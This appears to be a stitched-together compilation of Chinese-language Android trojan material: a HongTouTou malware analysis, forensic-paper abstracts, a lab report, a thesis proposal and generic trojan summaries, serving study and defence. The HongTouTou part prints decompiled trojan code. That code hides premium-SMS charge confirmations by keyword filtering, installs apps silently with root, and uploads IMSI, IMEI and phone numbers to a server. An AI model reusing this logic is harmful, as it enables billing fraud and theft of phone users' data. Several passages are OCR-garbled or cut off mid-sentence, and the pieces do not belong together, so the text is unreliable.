Android木马HongTouTou分析报告
Android木马分析与编写
Android 木马分析与编写作者 mangel一、 Android 木马介绍Android 系统比iPhone 系统更开放,允许安装第三方应用程序,甚至是那些没有获得谷歌应用商店Android Market 批准的应用程序,但这种开放性似乎也增加了安全风险。
Android Marke 本身也发现了恶意软件感染的应用程序,不过用户可以像在个人电脑上所做的那样,通过安装杀毒软件来加以防范。
二、 概述该程序安装完是一款桌面主题,并可设置壁纸等。
运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
三、 样本特征1. 敏感权限 <uses-permission android:name="android.permission.DELETE_PACKAGES"黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处></uses-permission> <uses-permission android:name="android.permission.INSTALL_PACKAGES" ></uses-permission> <uses-permission android:name="android.permission.READ_CONTACTS" ></uses-permission> android.setting.START_SEND_SMS android.setting.SMS_SENTandroid.provider.Telephony.SMS_RECEIVED2. 入口点和恶意模块public class MyReceiver extends BroadcastReceiver{}(1).发送拦截短信:String str39 = "android.setting.SMS_SENT"; try{String str41 = arrayOfSmsMessage[i13].getOriginatingAddress(); SmsManager localSmsManager4 = localSmsManager1; ArrayList localArrayList7 = localArrayList2;localSmsManager4.sendMultipartTextMessage(str41, null, localArrayList5, localArrayList7, null); }if (!paramIntent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")) if ((arrayOfSmsMessage[i13].getOriginatingAddress().contains("10658166")) || (arrayOfSmsMessage[i13].getMessageBody().contains("83589523")) || (arrayOfSmsMessage[i13].getMessageBody().contains("客服")) || (arrayOfSmsMessage[i13].getMessageBody().contains("资费")) || (arrayOfSmsMessage[i13].getMessageBody().contains("1.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("2.00元")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/条")) || (arrayOfSmsMessage[i13].getMessageBody().contains("元/次"))) abortBroadcast();(2). 获取ROOT 权限,安装卸载程序:private void installApk(String paramString1, String paramString2)try{Runtime localRuntime = Runtime.getRuntime();StringBuilder localStringBuilder = new StringBuilder("sudo pm install -r ");黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处File localFile2 = this.mContext.getFilesDir(); String str = localFile2 + "/" + paramString2; Process localProcess = localRuntime.exec(str); }private void installAPK() private void uninstallPlugin() { try {int i = Log.d("agui", "uninstall");Process localProcess = Runtime.getRuntime().exec("pm uninstall -r com.newline.root"); Intent localIntent1 = new Intent("android.intent.action.RUN"); Context localContext = this.mContext;Intent localIntent2 = localIntent1.setClass(localContext, MyService.class);ComponentName localComponentName = this.mContext.startService(localIntent1); return;}(3).窃取上传隐私资料:String str8 = Long.toString(System.currentTimeMillis()); Object localObject1 = localHashtable.put("id", str8); Object localObject2 = localHashtable.put("imsi", str4); Object localObject3 = localHashtable.put("imei", str5); Object localObject4 = localHashtable.put("iccid", str6); Object localObject5 = localHashtable.put("mobile", str7);String str9 = TimeUtil.dateToString(new Date(), "yyyyMMddHHmmss"); Object localObject6 = localHashtable.put("ctime", str9); Object localObject7 = localHashtable.put("osver", "1");Object localObject8 = localHashtable.put("cver", "010101"); Object localObject9 = localHashtable.put("uid", str1); Object localObject10 = localHashtable.put("bid", str2); Object localObject11 = localHashtable.put("pid", str3);Object localObject12 = localHashtable.put("softid", paramString2);MessageService.4 local4 = new MessageService.4(this, paramIResponseListener); NetTask localNetTask = new NetTask(localHashtable, "utf-8", 0, local4); String[] arrayOfString = new String[1]; arrayOfString[0] = paramString1;AsyncTask localAsyncTask = localNetTask.execute(arrayOfString);public class NetTask extends AsyncTask<String, Integer, String> protected String doInBackground(String[] paramArrayOfString) URL localURL1 = new java/net/URL;String str5 = localStringBuffer1.toString();黑客防线 w w w .h a c ke r .c o m .cn转载请注明出处URL localURL2 = localURL1; String str6 = str5;localURL2.<init>(str6);localHttpURLConnection = (HttpURLConnection)localURL1.openConnection(); localHttpURLConnection.setRequestMethod("GET"); localHttpURLConnection.setConnectTimeout(5000); localHttpURLConnection.setReadTimeout(5000);3. 敏感字符串("sudo pm install -r "); installAPK();contains("10658166") contains("83589523")contains("客服")contains("资费")四、 行为分析运行后获取ROOT 权限,私自下载安装程序;并发送扣费短信,订制SP 服务,拦截掉回执的扣费确认短信,恶意消耗用户资费;窃取用户通讯录信息等隐私资料,并上传到服务器。
Android手机木马提取与分析
必须 掌 握 网 络 钓 鱼 的 原 理 、A ndroid木 马 反 编 译 、应 用 程 序 安 装 包 提 取 等 专 业 知 识 . 基 于 上 述 分 析 ,通过案例 探 讨 在 电 信 钓 鱼 诈 骗 案 件 中 ,A ndroid木 马 a p k 的 提 取 方 式 和 a p k 反 编 译 分 析 ,并 通 过 示 例 操 作 进 一 步 认 识 A n droid手 机 木 马 的 提 取 和 分 析 方 法 . 关 键 词 :网 络 诈 骗 ;手 机 木 马 ; a d b ; 反编译 中图分类号:T P 3 9 3 文 献 标 识 码 :A 文 章 编 号 =1674 -5 6 3 9 (2 0 1 6 )0 6 -0 0 5 6 -0 7 DOI :1 0 .14091/j. cnki. kmxyxb. 2016. 06. 013
网络诈骗是以手机等可上网的设备为媒介, 采用电信设备通过欺骗的方式骗取款额较大的公 私财物的犯罪活动,其 中 网 络 钓 鱼 的 危 害 较 大 [1]. 诈骗团伙的诈骗方式是使用伪基站设备进行钓鱼 短 信 群 发 ,利 用 被 害 人 好 奇 、贪 财 、好 利 的 心 理 ,诱 骗 被 害 人 点 击 短 信 中 的 钓 鱼 链 接 ,被害 人 只 要 点 击 了 犯 罪 团 伙 提 供 的 钓 鱼 链 接 ,其 手 机 就 将 被 安 装 木 马 ,诈 骗 团 伙 能 够 实 现 远 程 控 制 ,达到盗取被
Detecting and Analyzing on Android Cell Phone Trojan
手机木马实验报告
手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件,它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。
为了深入了解手机木马的工作原理和危害程度,我们进行了一系列的实验。
2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为,评估其对手机和用户的威胁程度,以及提供相应的防护建议。
3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。
通过下载一款模拟手机木马的应用程序,并在实验过程中监测其行为,我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。
4. 实验结果在实验过程中,我们观察到以下几个现象:4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息,如联系人、短信、通话记录等。
我们发现,模拟的手机木马成功地获取了手机中的敏感信息,并将其上传到了远程服务器上。
4.2 功能控制手机木马可以远程控制手机的各项功能,包括拍照、录音、发送短信等。
我们测试了模拟木马的远程控制功能,发现它能够远程激活手机的摄像头,并将拍摄到的照片发送到远程服务器。
4.3 自我传播手机木马可以通过各种方式自我传播,如通过短信、应用商店等。
我们模拟了手机木马的传播行为,并观察到它成功地向其他手机发送了包含木马应用的短信,并诱导用户下载安装。
5. 结果分析通过以上实验结果,我们可以得出以下几点结论:5.1 手机木马对用户隐私的侵犯程度非常高,能够获取用户的敏感信息并传输给攻击者。
5.2 手机木马的功能控制能力使得攻击者可以远程操控手机,可能导致更严重的后果,如偷拍、窃听等。
5.3 手机木马的自我传播能力使得其传播速度非常快,可能导致大规模的感染。
6. 防护建议为了保护手机和用户的安全,我们提出以下防护建议:6.1 安装可信任的杀毒软件,并及时更新病毒库。
6.2 不要随意下载来历不明的应用程序,尤其是通过非官方渠道下载。
6.3 注意手机的权限设置,仅授权给必要的应用。
Android系统的智能手机木马攻防机制的分析的开题报告
Android系统的智能手机木马攻防机制的分析的开题报告一、选题背景Android系统是当前智能手机市场上使用最广泛的操作系统,在其背后的应用商店上,数不尽的应用在满足人们生活需求的同时,也不可避免地将各种恶意软件(例如木马)植入其中。
而正是这些恶意软件的存在,让人们的个人隐私、财产等重要信息面临着安全威胁。
为保障Android系统用户的信息安全,需对其存在的木马进行攻防机制的研究,以及探索相应的安全策略和技术手段。
本文将主要研究Android系统的智能手机木马攻防机制。
二、研究目的本文旨在研究Android系统的智能手机木马攻防机制,考察其主要特征和安全威胁,并提出相应的解决方案。
三、研究内容1. Android系统与智能手机木马的关系分析2. 智能手机木马的主要攻击手段和安全威胁分析3. Android系统智能手机木马检测与防范技术分析4. Android系统智能手机木马攻防实验及分析四、研究方法本文将采用文献资料法、实证研究法和案例分析法等研究方法,运用Android Studio等开发工具实现Android系统智能手机木马攻防实验,验证所提出的安全策略和技术手段是否有效。
五、预期成果1. 对当前Android系统智能手机木马形成了科学全面的认识。
2. 提出针对当前智能手机木马安全威胁的解决方案。
3. 提高用户对Android系统的信息安全认知和防范能力。
六、研究意义1. 面对日益严峻的安全威胁,研究智能手机木马攻防机制改进相应的安全技术及手段,极有必要性。
2. 提高用户对于Android系统的信息安全认知,改变用户依赖第三方应用商店下载应用的现状,更换为正式官网下载应用。
3. 本文的研究成果可以为Android系统研究现有的安全机制提供一定的促进作用,对于公司同时也是具有管理启示意义的。
4. 研究结果对于智能手机木马的防范,提高用户信息安全保护水平有着积极的推进作用。
七、研究进度安排第一、二周:查阅相关文献,了解Android系统的智能手机木马攻防机制的研究进展;第三、四周:分析智能手机木马的攻击手段和安全威胁特点;第五、六周:探讨Android系统智能手机木马检测与防范技术;第七、八周:选取典型案例,运用实证研究方法进行智能手机木马攻防实验;第九、十周:总结分析研究结果,撰写论文;第十一、十二周:完成论文修改工作。
android手机木马的提取与分析
android手机木马的提取与分析Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件,对手机木马病毒的特点、植入方式、运行状态进行了研究,利用dex2jar、jdgui等工具软件查看apk文件源代码。
结合实例,讲述了如何提取关键代码与配置数据,并对手机木马病毒的危险函数、启动方式、权限列表进行分析,证明了该方法的可行性,提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。
智能手机给用户带来便利的同时,手机恶意软件也在各种各样的违法活动中充当了重要角色,其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。
Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。
他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现,这种恶意短信中附的网址,其实就是诱导下载一个手机软件,安装后手机内并不会显示出该应用,但其中的木马病毒已植入,后台会记录下机主的一切操作,可以随时监控到手机记录。
若机主登录网银、支付宝、微信红包等,银行卡账号、密码就都被泄露了,黑客能轻易转走资金。
此类案件近期呈现高发的趋势。
面对各种各样善于伪装隐藏的手机木马病毒,如何提取分析,并固定证据成为一项重要工作。
本文从Android手机木马病毒的特点入手,讲述了如何提取分析关键代码与配置数据,从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。
诈骗、盗窃的目标不变,那就是诱导点击安装短信的链接网址中的木马。
木马植入到目标系统,需要一段时间来获取信息,必须隐藏自己的行踪,以确保木马的整体隐藏能力,以便实现长期的目的。
主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。
然后实现了Android系统下木马攻击的各种功能,主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。
Android平台几款新型的扣费木马深度分析
行中执行 命令 。此外 , 它还具有通过 WA P计 费服 务窃取 用户
资 金 的 功能 。 T r o j a l l — B a n k e r . A n d r o i d OS . Ub s o d是 W A P计 赞 木
马 中 最 为 流 行 。根 据 K S N 统计 , 2 0 1 7年 7月的 感 染 该 木 马软
程序 , 它 不 仅通 过 其 他 木 马 软 件 进 行 传 播 , 而 且 还 可 以作 为 独 立的 特 洛 伊 木 马 ( MD5 6 6 F E 7 9 B E E 2 5 A 9 2 4 6 2 A 5 6 5 F I ) 7 E D8 A ( J 3
信的 , 只要用户点击网页上的按钮 , 木马便开始 WA P计 费。
功能 , 例 如其 中一 些木马软件 包含了解 密和力 l l 载( 执行 ) 其 他
可 执 行 文 件 的功 能 , 这 些 特 洛 伊 木 马除 了通 过 W A P汁 赞服 务
别并且点击按钮后才向用户收 费。从计费的 角度来看 , 这种机 窃 取 资 金 外 ,还 执 行 一 个 命 名 为 T r 0 j a n — B a n k e r . A n d r o i d OS .
我 们 已 经 很 长 时 间 没 有 捕 获 到 这 样 的 木 马 样 本 丁 ,但 有 几 个 木 马软 件 在这 段 时 间 却 突 然 出现 , 几乎 在 同 一 时间 , 来 自
不 同 网络 犯 罪 团 体 的 不 同 特 洛 伊 木 马 针 对 不 同 国 家 ( 俄 罗 斯
B 4 ) 进 行传 播 。它 可 以 下载 和 安装 应 用 程 事 , 覆 盖 其 他 应 用 程 序的窗 口 ( 主 要 用 于 窃取 用 户 登录 凭据 或信 用 卡 的 信 息 ) 、 显 示广告 、 发送短信 、 窃取收 到的短消息 , 甚 至 能 够 在 设 备 命 令
Android恶意代码——木马APK分析
( 1 )不需要真 正执行恶 意代码 ,可 以避 免对恶意攻击者发现 ; ( 2 )误 报 率 低 ( 3 )不受具 体进程执行 流程 的制约,可 以对代码 进行详尽的细粒度分析 。 我 们通 过对 一线 公安 机关 办理 的相 关恶 意窃取隐私案件 中的 a p k样 本进行反编译 ,对 木 马部分源码 进行静态分析后可 以掌握犯罪嫌 疑人的手机号码及电子邮箱等个人信息,并能 掌握木 马取证的恶意操作:如读取短信、监控 短信收发、读取联系人、后 台发送 邮件等操作 。
3 基 于 安 卓 平 台 恶 意 代码 的 分 析
3 . 1 分 析 工 具 An d r o i d Ki l l e r 是 一 款 可 视 化 的安 卓 应 用 逆 向 工 具 ,集 Ap k反 编 译 、ip k打 包 、Ap k签 名 , 编 码 互 转 ,ADB通 信 ( 应用安装 一 卸 载 运 行 一
设备文件管理 )等特色功能于一身 。它包含 了 a d b 、a p k t o o l 、d e x 2 j a r 、i d - g u i 等反编译工具 。 其中 a p k t o o l 能将 a n d r o i d中 的 . a p k文 件转 换 成. d e x文件 ;d e x 2 j a r 能将 第一 步 的 . d e x文件 反 编译 成 . j a r 文件 ;j d - g u i 能将 . j a r 文 件 反编 译成 . j a v a 文件进行分析 。 3 . 2安卓木马 固定
漶 安全 ・ I n f o r ma t i o n S e c u r i t y
A n d r o i d恶意代码——木 马 A P K分析
文/ 卢委红 陶 一 鸣
优 点包 括 :
木马总结报告
木马总结报告木马总结报告随着计算机技术的快速发展,网络攻击手段也不断进化,其中一种最为常见且危害性较大的攻击就是木马病毒。
木马病毒是指以伪装成合法程序的方式,通过植入恶意代码,对计算机进行攻击和控制的一种恶意软件。
本次木马总结报告旨在总结和分析近期发生的木马攻击事件,以提供有效的防范措施和保护网络安全。
以下是报告的主要内容:1.攻击形式和目标:根据近期的木马攻击事件可看出,攻击形式多样化,包括通过电子邮件附件传播、植入恶意网页以及利用网络漏洞进行攻击等。
攻击目标主要集中在财务部门、企业及个人的敏感信息和关键数据。
2.攻击手段和特征:木马病毒通常具备隐蔽性和变异性,常使用加密技术和反调试等手段进行隐藏,使得其难以检测和防御。
同时,木马还会利用系统漏洞和弱密码等来入侵目标系统,以获取敏感信息或者进行远程控制。
3.攻击后果和风险:木马病毒的后果严重,一旦感染,木马将会执行各种恶意活动,如窃取个人账户信息、传播恶意软件、控制计算机进行攻击等。
这些活动对个人隐私和敏感信息的安全造成了极大威胁。
4.木马防御措施:为了有效防范木马病毒的攻击,我们应采取以下措施:- 安装并定期更新杀毒软件和防火墙,及时检测和拦截木马病毒的入侵。
- 注意电子邮件的来源和附件,避免点击未知链接或打开未知附件。
- 及时更新操作系统和软件补丁,以修补可能存在的系统漏洞。
- 加强账号和密码管理,使用复杂且安全的密码,并定期更换密码。
- 建立网络安全宣传教育机制,提高员工对网络安全的意识和警惕性。
5.应急响应和处置措施:一旦发生木马攻击,我们需要迅速采取应急响应和处置措施,包括:- 断开与外界的网络连接,将被感染的计算机隔离。
- 尽快启用预先设定的应急响应计划,采取适当的措施进行恢复和修复。
- 对被感染计算机进行全面扫描和清除木马病毒,并修复和加固系统漏洞。
- 监控网络活动和日志,寻找攻击来源和方法,以便后续追查。
总结:木马病毒是一种具有隐蔽性和变异性的恶意软件,给我们的计算机和网络安全造成了严重威胁。
安卓病毒分析报告
Android木马分析报告一、样本特征:1. 基本信息该病毒伪装成正常软件,启动时开启后台监听服务,后台拦截包含指定内容的短息并修改,窃取用户隐私,同时私下发送短信,存在诱骗欺诈行为。
样本MD5:3ea3c573b257e0ede90c23ff908be1ff样本包名:com.way.xx样本证书串号:53a67b752. 特征描述该病毒伪装成正常软件,启动时开启后台监听服务,后台拦截包含指定内容的短息并修改,窃取用户隐私,同时私下发送短信,存在诱骗欺诈行为。
二、样本分析:软件安装运行:图1 图2如图1所示,安装该病毒软件后桌面上出现一个类似正常软件的图标。
运行病毒后图标消失,如图2所示。
从病毒隐藏自身的图标来看,是恶意防止用户卸载,从而达到保护自身的目的。
如图下图所示是该病毒用到的一些敏感权限。
代码分析:软件入口程序入口com.way.activity.MainActivity,进入之后onCreate方法,此处SMSListenerService短信监听服务,同时启动服务后隐藏了图标。
调用的隐藏该软件图标的方法,在该病毒运行后达到隐藏图标的目的:病毒启动短信监听服务后,会在后台监控短信的广播消息。
获取短信的来源地址和短信内容,并监控包含知道你跟内容的短信,当接收到符合条件的短信后篡改其中的短信内容通过sendThread中的run方法将获得用户隐私上传到指定的服务器:后台发送短信AlarmReceiver中短信发送线程:从指定服务器获取短信信息的方法。
将从指定服务器获取的短信发送出去:结论:此病毒运行后会隐藏自身图标,防止用户卸载。
通过开启后台服务监听户用短信,并修改短信内容,后台私自发送短信,存在欺诈嫌疑。
木马分析报告
木马分析报告报告目的:本报告旨在通过对木马程序的分析和研究,为用户提供关于木马的详细信息,帮助用户更好地防范和排除木马程序的威胁。
报告结构:一、概述二、木马程序三、攻击方式四、防范措施五、排除方法六、结论一、概述随着网络技术的不断发展和进步,网络安全问题已成为人们关注的焦点。
木马程序作为一种危险的网络威胁,已经成为网络安全领域重点研究对象。
本报告旨在通过分析和研究木马程序的特点与行为,为用户提供更具体的木马防范措施,并帮助用户更好地解决木马问题。
二、木马程序1、定义木马程序是指在计算机系统中潜藏的一种恶意软件,它可以在用户不知情的情况下窃取用户的计算机信息,甚至控制计算机。
其具有隐蔽性、偷窃性、可控性、纵向渗透性等特点。
2、类型木马程序根据其功能和用途不同,可以分为远程控制木马、流氓软件、钓鱼木马、木马病毒等多种类型。
不同类型的木马程序具有不同的威胁等级和攻击方式。
三、攻击方式木马程序采取的主要攻击方式包括利用漏洞攻击、社会工程学攻击和通过外部控制平台等。
在用户不知情的情况下,木马程序可以通过这些方式远程控制电脑、窃取用户信息、散布病毒等。
四、防范措施为了有效地防范木马程序的攻击,用户需要根据实际情况采取多种防范措施,包括规范安装软件、使用安全浏览器、定期升级杀毒软件、加强密码管理、限制网络功能等。
这些措施可以大大减少木马程序的攻击风险。
五、排除方法用户如果发现自己的计算机已经中木马,应该采取及时有效的处理方式。
具体排除方法包括复原系统、安装杀毒软件、安装木马查杀工具、优化网络安全等。
六、结论通过对木马程序的分析和研究,我们可以发现,木马程序具有多种威胁手段和强大的攻击能力,对计算机和网络安全造成了一定的威胁。
为了有效地防范木马程序的攻击,用户需要根据实际情况采取多种防范措施,定期进行木马查杀和优化网络安全,避免造成不必要的损失。
Android木马Gapp分析报告
A NDROID木马G APP分析报告安天武研2012-02-09文档信息修订记录目录一、样本特征 (1)1. 基本信息 (1)2. 特征描述 (1)二、样本分析 (1)1. 静态分析 (1)2. 本地行为分析 (4)3. 网络行为分析 (5)三、检测和清除方法 (9)四、总结 (10)A NDROID木马G APP分析报告安天公司2012-02-09一、样本特征1.基本信息病毒名称:Trojan/Android.gapp.a[rmt]病毒类型:木马样本MD5:FC4104C17C9DC33C9FDA3CE52EDA2AFE样本CRC32:7D0AA8F1样本长度:71743 字节发现时间:2012年2月8日2.特征描述该样本对正常软件RAM优化管理器进行了恶意篡改,首次运行后在后台会访问网址http:\\,获取用来下载其他程序的URL列表保存在本地。
样本在每隔一段时间通过URL列表下载apk文件,每次下载一个,并伪造“系统更新”通知,骗取用户点击安装所下的程序。
样本每隔一段固定的时间会访问http:\\更新url 列表。
二、样本分析1.静态分析该样本在正常软件上进行了捆绑的操作,如下图所示,所有的恶意代码都集中在com.google.process.gapp包中。
(1)AndroidManifest.xml分析敏感权限:android.permission.RECEIVE_BOOT_COMPLETED 允许程序自启动恶意模块:接收器:com.google.process.gapp.A服务:com.google.process.gapp.GoogleServicesFrameworkService(2)接收器com.google.process.gapp.A分析该接收器监听系统启动的intent,当系统启动并且检测到sd卡时,开启服务com.google.process.gapp.GoogleServicesFrameworkService。
Android系统木马隐藏及检测技术分析
通信设计与应用 1 1 5
A n d r o i d系统木 马 隐藏及检 测技 术分 析
张 晟 ( 湖北工程职业学院, 湖北 黄石 4 3 5 0 0 3 )
【 摘 要 】 A n d r o i d系统 木马可以通过 r o o t 系统权 限的获取 , 实现对 内核表项隐藏功能的实现 , 从而使木马查杀软件 的检测也 能够获得有效的躲
i n u x原 本 的 系统 下进 行 的 , 其检 测 方 法 主要 有 两 种 形 式 , 即 数据的保护 , 并且 各 个 程 序 之 间的 访 问是 不 可 能 实现 的 : 文 件 L
决定的 , 且 均 由拥 有 者 和 所 属 组 I D 、 读 写执 行 等 三 个 不 同 的 向
A n d r o i d系 统 主 要 是 在 L i n u x 内核 的 基 础 上 建 立 起 来 的
将L K M 即 能 够进 行加 栽 的 内核 模 块技 术 添 加 至 L i n u x中 . 且 该模 块 在 系统 中存 放 的 形 式 主 要是 E L F对 象文 件 作 为 内核
本 地 隐 藏 关 键技 术 的 实现 主 要 是 通 过 L KM 的 技 术 所 实 现 的
A n d r o i d系统 本 身 的安 全 特 性 主 要 体 现 在 对 L i n u x内核 安 即 对 通 信 内容 和 信 道 的 隐 藏 , 这 种技 术在 木 马使 全 机 制 的 继 承 和 各 个 系 统框 架层 次 的 安 全 增 强 .在 此 基 础 上 如 通 信 隐藏 , 用 的过 程 中非 常 普 遍 ,技 术 的 实现 主 要 依 赖 的是 对传 输 内容 逐 渐 形 成 一 套 完整 且 独 特 的 安 全 体 系 的加 密 . 然 而 大 部 分 的木 马是 无 法 实现 对 通 信信 道 隐 藏 的 。 ( 1 ) 在L i n t l x基 础 上 所 建 立 的 安 全 机 制 。 用 户 控 制 : 基 于 A n d r o i d 系统 在 安 装 每 一 个 应 用程 序 时 都 会 分 配 一 个唯 一 的
木马查杀情况汇报
木马查杀情况汇报最近,我对木马查杀情况进行了一次全面的汇报,以下是我对最新情况的总结和分析:首先,我们对最近发现的木马进行了全面的排查和分析。
经过调查发现,最近出现的木马主要通过网络下载和邮件附件的方式传播,对用户的电脑系统和个人信息造成了严重威胁。
在对样本进行分析后,我们发现这些木马主要通过隐藏在常见文件中的形式进行传播,例如Word文档、PDF文件等。
因此,用户在打开这些文件时很容易受到木马的攻击。
其次,我们对木马的传播途径进行了详细的调查。
通过分析发现,这些木马主要通过一些常见的漏洞进行传播,例如操作系统的漏洞、浏览器的漏洞等。
此外,一些用户在下载软件时没有注意软件的安全性,导致木马通过软件进行传播。
因此,我们建议用户在使用电脑时要及时更新系统和软件,以及加强对网络安全的意识,避免在不安全的网站下载文件。
另外,我们还对木马的危害进行了分析。
经过调查发现,这些木马主要通过窃取用户的个人信息、监控用户的操作、篡改用户的文件等方式进行攻击。
一旦用户的电脑感染了木马,个人隐私和重要文件就会面临泄露和破坏的风险。
因此,我们建议用户在使用电脑时要加强对木马的防范意识,定期进行木马查杀,及时清理电脑中的垃圾文件和可疑文件。
最后,我们对木马查杀工具进行了评估。
经过测试和比较,我们发现一些知名的杀毒软件和安全工具在查杀木马方面效果较好,能够及时发现并清除电脑中的木马。
因此,我们建议用户在使用电脑时要安装可靠的杀毒软件和安全工具,定期对电脑进行全面的查杀和清理,确保电脑系统的安全性。
综上所述,木马查杀工作是一项重要的安全工作,需要我们高度重视和加强防范意识。
我们将继续加大对木马查杀工作的力度,为用户提供更加安全可靠的网络环境。
希望用户能够加强对木马的防范意识,保护好自己的电脑系统和个人信息。
同时,我们也欢迎用户对木马查杀工作提出宝贵意见和建议,共同为网络安全保驾护航。
Android平台木马的检验鉴定
E x a mi n a i t o n o f T r o j a n o n A n d r o i d P l a t f o r m
Q I N Y u — h a l , Y ANG S o n g , HO U S h i — h e n g
( Na t i o n a l P o l i c e U n i v e r s i t y o fC h i n a , S h e n y a n g 1 1 0 8 5 4 , C h i n a )
i n t r o d u c e d t h e s t uc r t u r e o f A n d r o i d p l a t f o m r a s w e l l a s t h e r e l a t e d p r i n c i p l e s o f T r o j a n v i us r . A s a s o l u t i o n , t h e s t u d y u s e d
t h e A D B c o mma n d t o e x t r a c t T r o j a n i f l e s o u t o f t h e q u e s t i o n e d d e v i c e s ,a n d a p p l i e d t h e r e v e r s e a n a l y s i s t e c h n o l o g y t o
Ch i n e s e J o u r n a l o f F o r e n s i c S c i e n c e s , 2 0 1 7 . N o . 3 T o t a l N o . 9 2
鉴
定Leabharlann 科学 Re s e ar c hPa pe r
2020年手机木马分析趋势报告
手机木马分析趋势报告日前,360互联网安全中心发布了《201x年末最流行手机木马分析趋势报告》,报告中公布了201x年感染量最高的100款手机木马。
其中,14年最为猖獗的色情类恶意应用在今年只占3%,而伪装成系统类应用的木马则占比高达54%。
此外,报告还将这100款手机木马的七大恶意行为详细列举,以便网民小心提防。
图1:201x年末感染量Top100手机木马伪装类型分布据报告显示,在感染量最高的100款木马中,安卓补丁和下载服务两款恶意木马占比高达11%,位列榜首,SettingProvider(设置服务程序)紧随其后,占比10%,更为猖獗的是,以SecurityPlugin(安全插件)为名隐藏在手机中的木马占比也高达8%。
360手机安全专家分析,致使伪装成系统程序的木马增多的原因是以此方法更容易进入手机,感染成功率更高,并且被卸载的几率更低。
此外,报告中还列出了该100款木马的七大恶意行为,包括私自下载、私自窃取隐私、释放恶意程序到系统目录、隐藏图标、恶意广告、阻止正常卸载、私发短信。
其中私自下载、隐私窃取、释放恶意程序到系统目录的恶意行为位居前三,分别占比57%、37%和36%。
图2:201xTop100木马恶意行为统计1、私自下载手机木马伪装成系统应用私自下载的恶意行为占总体的57%,排名第一。
其通过下载恶意插件、下载安装程序、下载推广应用,可以执行更多恶意行为,更主要的是,私自下载插件或APP,将直接威胁到用户的流量安全。
2、隐私窃取隐私窃取占恶意行为总体的37%,手机木马在用户不知情的情况下会窃取手机型号、IMEI号、手机短信、通讯录、照片甚至是支付宝账号密码、网银账号密码等,极易造成手机用户隐私外泄,财产受损。
3、释放恶意程序到系统目录手机木马获取Root权限后会释放恶意程序到系统目录,甚至替换掉正常系统文件,破坏手机系统,甚至能远程控制用户手机,直接威胁到手机的系统安全。
4、隐藏图标同样会威胁到系统安全的还有“隐藏图标”的恶意行为。
木马的安全评估报告
木马的安全评估报告
木马的安全评估报告应涵盖以下方面:
1. 功能和行为分析:报告应对木马的功能和行为进行详细的分析,包括木马的传播方式、感染途径、远程控制功能、数据收集和传输功能等。
评估报告应对木马的攻击效果进行模拟测试和分析。
2. 安全性分析:报告应对木马的安全机制和防御措施进行评估。
这包括木马是否容易被发现、是否可以被杀毒软件及其他安全工具检测、是否容易被反制等。
3. 影响评估:报告应对木马对受感染系统和网络的影响进行评估。
这包括木马可能造成的数据丢失、系统崩溃、网络瘫痪等影响。
4. 检测和移除指南:报告应提供有关如何检测和移除木马的指南。
这包括如何使用杀毒软件和其他安全工具来检测和消除木马,以及如何修复受感染系统。
5. 恢复和预防建议:报告应提供有关如何恢复受感染系统和网络的建议。
这包括如何修复受损的系统和数据、加强安全防护措施以预防类似攻击的再次发生等。
总体而言,木马的安全评估报告应全面评估木马的功能、安全性和影响,提供检测和消除指南,并提出恢复和预防建议,为受感染的系统和网络提供有效的保护和恢复措施。
移动端病毒木马防治分析(二)
作者:危险漫步网络安全是否有尽头,是否会像某些行业一样,只是昙花一现,过个几十年,网络安全就不再存在,会被完美的安全体系所打败,不再存在漏洞,不再存在威胁人们互联网生活的事情,现如今人们享受着互联网带来的便捷,就注定会有它的反面,这里的便捷,就是犯罪这种行为,在互联网上也同样便捷。
这种犯罪的低成本,让我们国家参与网络犯罪的人,普遍处于低龄化,很多青少年轻而易举的就参与到其中,而因为网络的隐蔽性,也极大的加大了公安机关破获网络犯罪的难度。
要提高对网络犯罪的打击力度,才能有效减少网络犯罪发生的概率,应该从整个网络环境做起,提高犯罪成本,让网络犯罪不再轻松进行,至少不能让一个上小学的孩子,去完成入侵一个事件。
至少得把网络系统做得不那么容易入侵,这才是重中之重。
网络安全做不到绝对的安全,但是是可以提升的,至少要让入侵行为进行的不是那么轻松。
常见移动端木马分析及解决(二)移动端木马的现状是类型少,真正的移动端木马技术只掌握在少部分人手中这也就导致了移动端木马相比pc端木马而言,并不是那么泛滥,在日常生活中也会感受到,经常能够听到身边的人说到自己的电脑被黑客入侵了,但是很少人会说自己的手机被黑客入侵了,也许是因为手机病毒很难被发现,但是更多的一定是因为手机端木马传播的还算不多。
2.1安卓远程控制木马分析及解决安卓的系统是一个开源的、历时长久、市场占有率最多的一款移动端操作系统,由于其开源端性质,导致安卓频繁爆出严重端安全漏洞,这里就远程控制安卓手机的木马进行分析。
木马想要在安卓系统中进行操作,必须要想安卓系统文件中进行一个申请,并且需要进行确认的定义不然的话根本没有办法去进行任何操作(root除外),这样的话,只需要去查看木马程序所进行申请权限的纪录,就可以大概判断出木马所具备的功能,可以使用安卓的安装模拟器判断出木马所需要的权限。
目前安卓系统研究的黑客比较少,迟早也会变为新的木马泛滥的平台。
